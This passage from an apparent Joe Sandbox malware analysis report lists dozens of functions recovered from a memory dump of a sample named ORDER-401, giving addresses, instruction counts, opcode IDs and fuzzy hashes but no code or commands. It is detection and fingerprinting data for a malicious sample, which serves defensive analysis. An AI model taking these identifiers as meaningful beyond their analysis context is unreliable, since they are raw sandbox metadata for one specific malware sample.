                                                                    Function 01600115 Relevance: .0, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ed8532eae2456fd693e6f6206ec390b567db2020280f48f9e0002a93089c64f4
                                                                    • Instruction ID: c80edff927bf269d5e3c8cb7def21656916fbd3683f059a7e39c91a32ac566eb
                                                                    • Opcode Fuzzy Hash: ed8532eae2456fd693e6f6206ec390b567db2020280f48f9e0002a93089c64f4
                                                                    • Instruction Fuzzy Hash: 54F02726419AC22ACB375B6CEC503D22B65A782064F0A20C9D5A59B385C7748593C360
                                                                    Function 0157C5ED Relevance: .0, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dd8bd806ff4b0d850c246a9557571cfffabea895f5f18e2b51665bae2839e539
                                                                    • Instruction ID: 9656b17737e4a25d9896682440e5ade3e4b2bc4f0912385c2315f15b8bcc8da8
                                                                    • Opcode Fuzzy Hash: dd8bd806ff4b0d850c246a9557571cfffabea895f5f18e2b51665bae2839e539
                                                                    • Instruction Fuzzy Hash: B8F0E2715216539FE722971CE1C9B19BBD4BB407A0F099866D9068F512C760E880CA50
                                                                    Function 01582619 Relevance: .0, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                    • Instruction ID: b43b27888f060495ec847f7768928fbbb381d8fbcc1b9224a8260770bfbf5948
                                                                    • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                    • Instruction Fuzzy Hash: 58E0D8723006426BE712AE5A8CC0F577B6EFFD2B14F04407DB9046F251CAE2DC09C2A4
                                                                    Function 015D6030 Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                    • Instruction ID: bac68910a1d68f2b57aa623b33b11839ce76122e6336aebfc9f03ce10f4ce4a5
                                                                    • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                    • Instruction Fuzzy Hash: B6F08C721102049FE3218F09D844B56B7F8FB05364F01C026E6088F160D339EC41CBA0
                                                                    Function 01540710 Relevance: .0, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                    • Instruction ID: 438176964fc14aaa3913f9339e03ba90c5403a688a294fa14668d31197bc28b6
                                                                    • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                    • Instruction Fuzzy Hash: E4F0E5392043459BEB16DF19C050AD97BE4FB41394B100455FD468F381D731E981CB52
                                                                    Function 015749D0 Relevance: .0, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                    • Instruction ID: 6b563a58f34b0d45ddd6716107665efd9ed89afa1cdbedf7780f3653072f4eed
                                                                    • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                    • Instruction Fuzzy Hash: A5E0D832654186AFD3223A59A802B7A77E7FBD07A0F150429E6008F160FBF0DC40D7D8
                                                                    Function 015E678E Relevance: .0, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                    • Instruction ID: 37097db2541e2aab8de8d63ae8f3a7ebae100eb26aed5c4946ce9c6a8afdfddf
                                                                    • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                    • Instruction Fuzzy Hash: 03E0DF72A40120BBDB2297998D15F9ABEACEBA4EA0F050055BA00EB090E530EE00D690
                                                                    Function 015425E0 Relevance: .0, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6b614c1b20125c9b845c8a8c3d33f89d6d56ac9d49705788e22e344ccf0525f6
                                                                    • Instruction ID: 5dc8ede1344a4dbfbda8d51fb40f3a1cd5072c8b93eada9e78fe8676ba40945a
                                                                    • Opcode Fuzzy Hash: 6b614c1b20125c9b845c8a8c3d33f89d6d56ac9d49705788e22e344ccf0525f6
                                                                    • Instruction Fuzzy Hash: CCE09232100555ABC322BF29DD11F8A7B9AFFA03A4F014515B1555B190CB30A910C794
                                                                    Function 015C4000 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                    • Instruction ID: b4f78fe95104d3c09e2d97bbf1c1881da22a4105e441239cac40ebfd1a400800
                                                                    • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                    • Instruction Fuzzy Hash: 0AE0C2343403058FE715CF59C050B667BB6BFD5A10F28C068A9488F205EB32E842CB40
                                                                    Function 0157CA38 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 598794797269d830f9a357ad646828aa4e8bda7a8e2b9ae278185455e583d04e
                                                                    • Instruction ID: 867b8af01249c9dc7fa41ff7eedaa863254941c8333ae76ed79e2da56a01b8c7
                                                                    • Opcode Fuzzy Hash: 598794797269d830f9a357ad646828aa4e8bda7a8e2b9ae278185455e583d04e
                                                                    • Instruction Fuzzy Hash: 38D02B324910636ECB76F529BC05F973A9DBB80321F0188A1F5089A010D594CC9197C4
                                                                    Function 0153823B Relevance: .0, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                    • Instruction ID: ab3d2de06e1dec20457391f0646bffdd30902fa707c0a69d901ddfbdc01c9cc9
                                                                    • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                    • Instruction Fuzzy Hash: FDE08C31001A12EFDB362E25DC00F557BE1FFD4B51F214A2AF0851F4A486B4A891CA44
                                                                    Function 01542050 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2af651c0392c3b6cd0da1368af38b0bc93aaa42bbd1f1dd164d23b61e82f5aee
                                                                    • Instruction ID: 91aed8c051ff0aa6940d40b59696bbdfc8181dae316b36d2d124d8557678655c
                                                                    • Opcode Fuzzy Hash: 2af651c0392c3b6cd0da1368af38b0bc93aaa42bbd1f1dd164d23b61e82f5aee
                                                                    • Instruction Fuzzy Hash: 74E08C321004616BC312FA5DED10F4A739AFFE52A0F000121B1548B694CA70AD00C7A4
                                                                    Function 01578A90 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                    • Instruction ID: df693f534c67f0f1ff5f786e99ab131b8bf92979b1007417046def07b2c651c2
                                                                    • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                    • Instruction Fuzzy Hash: 22E08633511A1487C728EE18D516B7677E4FF45730F09463EA6134B780C574E544C794
                                                                    Function 01596AA4 Relevance: .0, Instructions: 17COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                    • Instruction ID: 24baa1e0c2141a64c5a336bfb02b1834793debb738e7c0f004c707356aefb193
                                                                    • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                    • Instruction Fuzzy Hash: 9FD05E36511A50EFC7729F1BEA00C13BBF9FFC5B50709062FA54587920C674A806CBA0
                                                                    Function 0157E59C Relevance: .0, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                    • Instruction ID: b4b76ed37a7d748d1174dd8519ecad770a8c2faf2057f83e35d753e75b846468
                                                                    • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                    • Instruction Fuzzy Hash: 5DD0A972614620ABDBB2AA1CFC00FC373E8BB88760F06045AB108CB150C360AC81CA84
                                                                    Function 015BE908 Relevance: .0, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                    • Instruction ID: 81ec6792ddbaa59a3cbe19d2692af4163750e44b91b3be67dc59828be82e1e61
                                                                    • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                    • Instruction Fuzzy Hash: A1E0EC359506859BDF56DF59C681F9EBBB5FB94B40F190054A5085F660C734AD00CB40
                                                                    Function 0153A0E3 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                    • Instruction ID: 59f71651ef806ea6792120dc42fa0658286ea4e84823e7a67bec6d27ca9ed3ae
                                                                    • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                    • Instruction Fuzzy Hash: 08D0223222203193CB689655A810F67AB05BFC0AD0F0A002D380ADB800C1048C42C2E0
                                                                    Function 0157A830 Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                    • Instruction ID: 22c3ec1f5351ff07bbe13dfa76aa0db5a493b2976168cacd20c877d903ef7949
                                                                    • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                    • Instruction Fuzzy Hash: AED012371E054DBBCB519F66DC01F957BA9FBA4BA0F444021B9088B5A0C63AE950D584
                                                                    Function 0157CA24 Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ca9d7f468838416b36a5a80dddc85562716ce6306d1bf057d4ae3924f138deac
                                                                    • Instruction ID: 8520f167d42c70f6ce89a784bc07b21fd4859199c3540d56ab578aba5e16eb34
                                                                    • Opcode Fuzzy Hash: ca9d7f468838416b36a5a80dddc85562716ce6306d1bf057d4ae3924f138deac
                                                                    • Instruction Fuzzy Hash: 3AD0A730511403DBDF17EF08C961D6E3FB4FF10681B40106CE70059820D368EC01C610
                                                                    Function 015502A0 Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                    • Instruction ID: fdec606ed4492d37da4eee87fc713ade07cec75209a06d1c80d738e9d064b7ea
                                                                    • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                    • Instruction Fuzzy Hash: 8ED09235252E80CFD76A8B4CC5A4B1973A4BB44B84F850891E801CBB62D668D940CA00
                                                                    Function 0157C700 Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                    • Instruction ID: 0b54ee6b16f29997077e2cdf000156c161fe643abf1682eb876f8c90c6054a95
                                                                    • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                    • Instruction Fuzzy Hash: 86C01232150644AFC7519A95CD01F0177A9FB98B40F000021F6044B570C531E810D644
                                                                    Function 01560310 Relevance: .0, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                    • Instruction ID: c37ae190aaec7cee40bc83615d2d853a01d679d65b6bcba71e6eac27632d2d4d
                                                                    • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                    • Instruction Fuzzy Hash: F7D01236200289EFCB05DF45C890D9A772AFBD8710F108019FD190B6508A31ED62DA90
                                                                    Function 01540750 Relevance: .0, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                    • Instruction ID: 7b3ccfc9b95dd3f2569e486089e7777279a3500264271dbf25ef2deef3d3563a
                                                                    • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                    • Instruction Fuzzy Hash: 23C04879701A828FCF56DB6AD2A4F4977F4FB84780F150890E84ACFB22E624E801CA11
                                                                    Function 01584340 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e8e6cea04c2adcbfa276375928be6bbfcb494df469a597dc01bc7a13d7636a11
                                                                    • Instruction ID: 239531ced99771b061f04bdbe1fb2d282ce20b58c7fa10939b86df76536bf505
                                                                    • Opcode Fuzzy Hash: e8e6cea04c2adcbfa276375928be6bbfcb494df469a597dc01bc7a13d7636a11
                                                                    • Instruction Fuzzy Hash: 20900231605804129640715848845464045B7E1311B59C411E0428954CCA588A565366
                                                                    Function 01584650 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 86093b46b158b8122629a5634f8ae779b00b5606a8956bd25a6f47002a4eef32
                                                                    • Instruction ID: ccf872d23db118e8c8a8f67f8aa5e9bd0e3b7e029f2523df895dd08a87264665
                                                                    • Opcode Fuzzy Hash: 86093b46b158b8122629a5634f8ae779b00b5606a8956bd25a6f47002a4eef32
                                                                    • Instruction Fuzzy Hash: 81900261601504424640715848044066045B7E2311399C515A0558960CC65C8955936E
                                                                    Function 01582BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b3a82487b69d2b17eba52b364cdfca78e62bf1c427591802c0053f19685c3120
                                                                    • Instruction ID: 3ec1be52cde4aba7af600488882df5c2fc4a86e5e7217d0ddff64d30f9cf4f10
                                                                    • Opcode Fuzzy Hash: b3a82487b69d2b17eba52b364cdfca78e62bf1c427591802c0053f19685c3120
                                                                    • Instruction Fuzzy Hash: 4D90023120140C02D6807158440464A0045A7D2311F99C415A0029A54DCA598B5977A6
                                                                    Function 01582BE0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: effc6b2d65172f460b62be7b4963c3705bd432c5bcb700d8909a2869647d938a
                                                                    • Instruction ID: 1b8e424f1a766fa56f0dd6486a7100f16c937f92ee866160c5dd7630bdc270e4
                                                                    • Opcode Fuzzy Hash: effc6b2d65172f460b62be7b4963c3705bd432c5bcb700d8909a2869647d938a
                                                                    • Instruction Fuzzy Hash: 6D90023120544C42D64071584404A460055A7D1315F59C411A0068A94DD6698E55B766
                                                                    Function 01582B80 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 542b621f4be56cf8ad7d8c3b7ff09527947a3fddba3c00b86ba20ce436293366
                                                                    • Instruction ID: afa14c868ec5315db3cb53062b62f266e7dd4225ef9bf6013604157048deee93
                                                                    • Opcode Fuzzy Hash: 542b621f4be56cf8ad7d8c3b7ff09527947a3fddba3c00b86ba20ce436293366
                                                                    • Instruction Fuzzy Hash: 9590023120140C02D604715848046860045A7D1311F59C411A6028A55ED6A989917236
                                                                    Function 01582BA0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f74fccd7a5a093d6b480fc4312d6a6f57d4c3a4d40dce611700c22c3f4861ddd
                                                                    • Instruction ID: eaa4b06f3ceeb6e8edb487773b6793f07d2e65eb7eb2b15f6d0589ea45b73e6a
                                                                    • Opcode Fuzzy Hash: f74fccd7a5a093d6b480fc4312d6a6f57d4c3a4d40dce611700c22c3f4861ddd
                                                                    • Instruction Fuzzy Hash: 2090023160540C02D650715844147460045A7D1311F59C411A0028A54DC7998B5577A6
                                                                    Function 01582AD0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ee40c63a539cfb59595cba071d28e25e44a5c88ab3a0c9574a9a4c03f5b61093
                                                                    • Instruction ID: 785efd4d4ff4647408657089d806190262fcd390d20f74917720717079434d9d
                                                                    • Opcode Fuzzy Hash: ee40c63a539cfb59595cba071d28e25e44a5c88ab3a0c9574a9a4c03f5b61093
                                                                    • Instruction Fuzzy Hash: F8900225211404030605B55807045070086A7D6361359C421F1019950CD66589615226
                                                                    Function 01582AF0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 721a6ec2317192a17d6ea20a2ff11ffd66c070e771f075d963d2a29ba68ccb24
                                                                    • Instruction ID: 924f8b4f5928df5c8cf8ffa6cf8697138e157c1fceed888843dfe5e1c878dca0
                                                                    • Opcode Fuzzy Hash: 721a6ec2317192a17d6ea20a2ff11ffd66c070e771f075d963d2a29ba68ccb24
                                                                    • Instruction Fuzzy Hash: F9900225221404020645B558060450B0485B7D7361399C415F141A990CC66589655326
                                                                    Function 01582AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f516d832d15ec1552a23ad59262e13ae5a513f627fda5780ab7c7cf386ec88f5
